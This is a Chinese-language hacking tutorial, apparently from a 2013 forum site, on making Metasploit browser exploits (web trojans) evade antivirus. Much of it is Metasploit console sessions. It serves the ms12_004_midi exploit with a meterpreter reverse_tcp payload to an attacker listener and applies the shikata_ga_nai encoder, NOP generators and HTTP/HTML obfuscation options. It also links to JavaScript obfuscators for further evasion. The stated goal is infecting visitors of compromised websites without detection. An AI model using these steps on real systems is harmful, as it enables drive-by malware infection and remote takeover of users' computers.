作品发布     邀请码    设为首页  收藏 

当前位置:文章病毒 → 文章内容 >> Metasploit网马的免杀


Metasploit网马的免杀

更新时间:2013-9-14 0:23:52   作者:华中帝国整理  来源:华中帝国
关于网马 近几年国内网站挂马呈现井喷式的增长,网马解密也逐步为人们所重视. 网马就是在网页中植入木马,你打开网页就运行了木马程序,使你在不知不觉中中毒。 网页木马实际上是一个HTML网页,与其它网页不同的是该网页是黑客精心制作的,用户一旦访问了该...
  关于网马
  近几年国内网站挂马呈现井喷式的增长,网马解密也逐步为人们所重视.
  网马就是在网页中植入木马,你打开网页就运行了木马程序,使你在不知不觉中中毒。
  网页木马实际上是一个HTML网页,与其它网页不同的是该网页是黑客精心制作的,用户一旦访问了该网页就会中木马。
  为什么说是黑客精心制作的呢?因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞,让IE在后台自动下载黑客放置在网络上的木马并运行(安装)这个木马,也就是说,这个网页能下载木马到本地并运行(安装)下载到本地电脑上的木马,整个过程都在后台运行,用户一旦打开这个网页,下载过程和运行(安装)过程就自动开始。
  关于metasploit
  metasploit聚合了上百的网马,你可以随心使用喜欢的shellcode,让渗透更加简单,但是在这工程中,如果对方按张了防火墙咋办?
  就像下图:
  网马免杀
  哪最新的midiOutPlayNextPolyEvent Heap Overflow来说 ,先生成一个普通的
  msf > use exploit/windows/browser/ms12_004_midi
  msf exploit(ms12_004_midi) > show options
  Module options (exploit/windows/browser/ms12_004_midi):
  Name Current Setting Required Description
  ---- --------------- -------- -----------
  OBFUSCATE false no Enable JavaScript obfuscation
  SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
  SRVPORT 8080 yes The local port to listen on.
  SSL false no Negotiate SSL for incoming connections
  SSLCert no Path to a custom SSL certificate (default is randomly generated)
  SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
  URIPATH no The URI to use for this exploit (default is random)
  Payload options (windows/meterpreter/reverse_tcp):
  Name Current Setting Required Description
  ---- --------------- -------- -----------
  EXITFUNC process yes Exit technique: seh, thread, process, none
  LHOST 5.5.5.1 yes The listen address
  LPORT 4444 yes The listen port
  Exploit target:
  Id Name
  -- ----
  0 Automatic
  msf exploit(ms12_004_midi) > exploit
  [*] Exploit running as background job.
  [*] Started reverse handler on 5.5.5.1:4444
  [*] Using URL: http://0.0.0.0:8080/qhvy86C7TNlbqQN
  [*] Local IP: http://112.114.168.177:8080/qhvy86C7TNlbqQN
  [*] Server started.
  msf exploit(ms12_004_midi) >
  查看网马代码 看看传说中的网马
  brk@Dis9Team:~$ wget -U "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5)" http://112.114.168.177:8080/qhvy86C7TNlbqQN -O 1 | more 1
  --2012-03-12 01:18:15-- http://112.114.168.177:8080/qhvy86C7TNlbqQN
  正在连接 112.114.168.177:8080... 已连接。
  已发出 HTTP 请求,正在等待回应... 200 OK
  长度: 35426 (35K) [text/html]
  正在保存至: “1”
  100%[======================================>] 35,426 --.-K/s 花时 0s
  2012-03-12 01:18:15 (213 MB/s) - 已保存 “1” [35426/35426])
  ::::::::::::::
  1
  ::::::::::::::
  <html>
  <head>
  <script language='javascript'>
  //
  // JavaScript Heap Exploitation library
  // by Alexander Sotirov <asotirov@determina.com>
  //
  // Version 0.3
  //
  // Copyright (c) 2007, Alexander Sotirov
  // All rights reserved.
  //
  // The HeapLib library is licensed under a BSD license, the text of which follow
  s:
  //
  // Redistribution and use in source and binary forms, with or without
  // modification, are permitted provided that the following conditions
  // are met:
  //
  // 1. Redistributions of source code must retain the above copyright
  // notice, this list of conditions and the following disclaimer.
  // 2. Redistributions in binary form must reproduce the above copyright
  // notice, this list of conditions and the following disclaimer in the
  // documentation and/or other materials provided with the distribution.
  // 3. Neither the name of Alexander Sotirov nor the name of Determina Inc.
  // may be used to endorse or promote products derived from this software
  // without specific prior written permission.
  恩 操蛋啊 明文的 不被杀才挂
  ENCODER免杀
  Metasploit提供了SHELLCODE生成EXE PHP VBS DLL等等 也提供了免杀的功能,网马呢? 能的
  先结束网马进程
  msf exploit(ms12_004_midi) > jobs
  Jobs
  ====
  Id Name
  -- ----
  0 Exploit: windows/browser/ms12_004_midi
  msf exploit(ms12_004_midi) > kill 0
  Stopping job: 0...
  [*] Server stopped.
  msf exploit(ms12_004_midi) >
  用ENCODER进行网页编码 可选项:
  set ENCODER cmd/generic_sh set ENCODER x86/call4_dword_xor
  set ENCODER cmd/ifs set ENCODER x86/context_cpuid
  set ENCODER cmd/printf_php_mq set ENCODER x86/context_stat
  set ENCODER generic/none set ENCODER x86/context_time
  set ENCODER mipsbe/longxor set ENCODER x86/countdown
  set ENCODER mipsle/longxor set ENCODER x86/fnstenv_mov
  set ENCODER php/base64 set ENCODER x86/jmp_call_additive
  set ENCODER ppc/longxor set ENCODER x86/nonalpha
  set ENCODER ppc/longxor_tag set ENCODER x86/nonupper
  set ENCODER sparc/longxor_tag set ENCODER x86/shikata_ga_nai
  set ENCODER x64/xor set ENCODER x86/single_static_bit
  set ENCODER x86/alpha_mixed set ENCODER x86/unicode_mixed
  set ENCODER x86/alpha_upper set ENCODER x86/unicode_upper
  set ENCODER x86/avoid_utf8_tolower
  我用x86/shikata_ga_nai吧
  msf exploit(ms12_004_midi) > set ENCODER x86/shikata_ga_nai
  ENCODER => x86/shikata_ga_nai
  msf exploit(ms12_004_midi) > exploit -j
  [*] Exploit running as background job.
  [*] Started reverse handler on 5.5.5.1:4444
  [*] Using URL: http://0.0.0.0:8080/gNaH1Zi9e5
  [*] Local IP: http://112.114.168.177:8080/gNaH1Zi9e5
  [*] Server started.
  msf exploit(ms12_004_midi) >
  nops
  一序列的0x90的位元组,Metasploit可生成不可预测的
  msf exploit(ms11_050_mshtml_cobjectelement) > show nops
  NOP Generators
  ==============
  Name Disclosure Date Rank Description
  ---- --------------- ---- -----------
  armle/simple normal Simple
  php/generic normal PHP Nop Generator
  ppc/simple normal Simple
  sparc/random normal SPARC NOP generator
  tty/generic normal TTY Nop Generator
  x64/simple normal Simple
  x86/opty2 normal Opty2
  x86/single_byte normal Single Byte
  evasion
  恩,查看一下:
  msf exploit(ms11_050_mshtml_cobjectelement) > show evasion
  Module evasion options:
  Name : HTML::base64
  Current Setting: double_pad
  Description : Enable HTML obfuscation via an embeded base64 html object (IE
  not supported) (accepted: none, plain, single_pad, double_pad,
  random_space_injection)
  Name : HTML::javascript::escape
  Current Setting: 0
  Description : Enable HTML obfuscation via HTML escaping (number of iterations)
  Name : HTML::unicode
  Current Setting: utf-32le
  Description : Enable HTTP obfuscation via unicode (accepted: none, utf-16le,
  utf-16be, utf-16be-marker, utf-32le, utf-32be)
  Name : HTTP::chunked
  Current Setting: false
  Description : Enable chunking of HTTP responses via "Transfer-Encoding:
  chunked"
  Name : HTTP::compression
  Current Setting: none
  Description : Enable compression of HTTP responses via content encoding
  (accepted: none, gzip, deflate)
  Name : HTTP::header_folding
  Current Setting: false
  Description : Enable folding of HTTP headers
  Name : HTTP::junk_headers
  Current Setting: false
  Description : Enable insertion of random junk HTTP headers
  Name : HTTP::server_name
  Current Setting: Apache
  Description : Configures the Server header of all outgoing replies
  Name : TCP::max_send_size
  Current Setting: 0
  Description : Maximum tcp segment size. (0 = disable)
  Name : TCP::send_delay
  Current Setting: 0
  Description : Delays inserted before every send. (0 = disable)
  msf exploit(ms11_050_mshtml_cobjectelement) >
  这个很简单 选择就行
  Social-Engineer Toolkit
  Social-Engineering Toolkit(SET) 是一个由 David Kennedy (ReL1K)设计的社会工程学工具.SET在统一简单的界面上集成了多个有用的社会工程学攻击工具,他主要就是利用了metasploit的网马 + 网页伪造 + DNS 欺骗,这个需要装好多东西,有功夫的自己搞
  自动动手
  生成了网马用wget伪造AGENT下载以后进行免杀
  http://www.daftlogic.com/projects-online-javascript-obfuscator.htm
  http://javascriptcompressor.com
  http://dean.edwards.name/weblog/2007/04/packer3
  更改源代码
  http://funoverip.net/2011/04/100pc-anti-virus-evasion-with-metasploit-browser-exploits-from-ms11-003/
关键字:网马免杀

   免责声明:本文仅代表作者个人观点,与本站无关。其原创性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容、文字的真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。

责任编辑:华中帝国        



本文引用网址: 

Metasploit网马的免杀的相关文章
发表评论

用户名: 查看更多评论

分 值:100分 85分 70分 55分 40分 25分 10分 0分

内 容:

         (注“”为必填内容。) 验证码: 验证码,看不清楚?请点击刷新验证码